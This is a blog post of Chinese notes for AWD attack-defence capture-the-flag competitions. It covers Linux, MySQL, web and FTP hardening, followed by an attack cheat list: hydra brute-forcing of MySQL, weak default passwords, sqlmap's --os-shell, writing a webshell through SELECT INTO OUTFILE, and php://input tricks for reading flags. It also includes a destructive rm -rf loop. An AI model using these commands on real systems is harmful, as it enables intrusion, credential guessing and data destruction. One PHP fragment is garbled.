AWD攻防

linux加固思路

操作系统

  • awk -F: '/bash$/{print $1}' /etc/passwd 看不是nologin的用户

    image-20191222204439238

    • 删除用户,改密码

      • echo 用户名:密码 | chpasswd

      • 锁定用户 passwd -l 用户名 (-u 解锁)

      • /etc/hosts.allow 添加sshd:ip 限制登陆ip

        image-20191222205000466

      • /etc/hosts.deny 添加sshd:ALL 拒绝所有ip连接,先设置deny,在设置allow

        image-20191222205040511

  • ps -ef | grep 服务名 查看系统进程

    image-20191222205141209

    • netstat -tunlp 查看系统进程

      image-20191222205231220

      • kill -9 pid 强制杀进程
  • 注意查看./文件,

image-20191222205325439

  • 开机自启动服务 /etc/rc.local

数据库加固

  • mysql -u root -h127.0.0.1 -p 登陆数据库
    • select * from users; 查看所有用户
      • 看表中host值为%,删除 delete from user where user='root' and host='%';
      • set password for '用户'@'地址'=password('新密码');
      • flush privileges; service mysql restart 保存、重启数据库

web加固

  • 备份网站文件

  • find ./ -name '*.php' | xargs grep -n 'eval' 查找文件中关键函数

  • import os

    import time

    while 1:

    ​ os.system('rm -rf /tmp/*')

    ​ time.sleep(1)

    删除文件上传目录下的文件,不允许文件存在

  • 修改函数加固,限制上传文件

  • 网站目录权限 chmod -R 000 /var/www/html

ftp

  • /etc/vsftpd.conf

    • chroot_local_user=YES 将用户限制在主目录

    • local_root=/media/ftp/pub 本地用户主目录

    • anonymous_enable=NO 匿名用户

日志

  • /var/log/apache2/access.log 日志利用

攻击

  • 信息收集

  • 爆破

    • hydra -L 用户名字典 -P 密码字典 mysql://IP地址 -v

    • 弱密码登陆 root、server、admin、user。。。。。。。

      image-20191222214922135

  • 系统漏洞

    image-20191222214955725

  • ftp

    image-20191222215201358

  • 查找后门

    image-20191222215253199

  • 绕过

    image-20191222215338142

  • phpmyadmin

    image-20191222215403086

mysql数据库利用

  • sqlmap -d'mysql://账号:密码@IP地址:3306/mysql' --os-shell 返回一个shell
  • select “” into outfile "/var/www/html/alin.php";

web利用

php://input data:text/plain; 都可用这个语句读flag

$line){ echo "Line #{$line_num} : ",$line,'
';} ?>

/var/log/secure # 与安全相关的日志信息 系统日志

/var/log/apache/access.log 网站日志

posted @ 2022-06-09 15:52  Rlins  阅读(131)  评论(0)    收藏  举报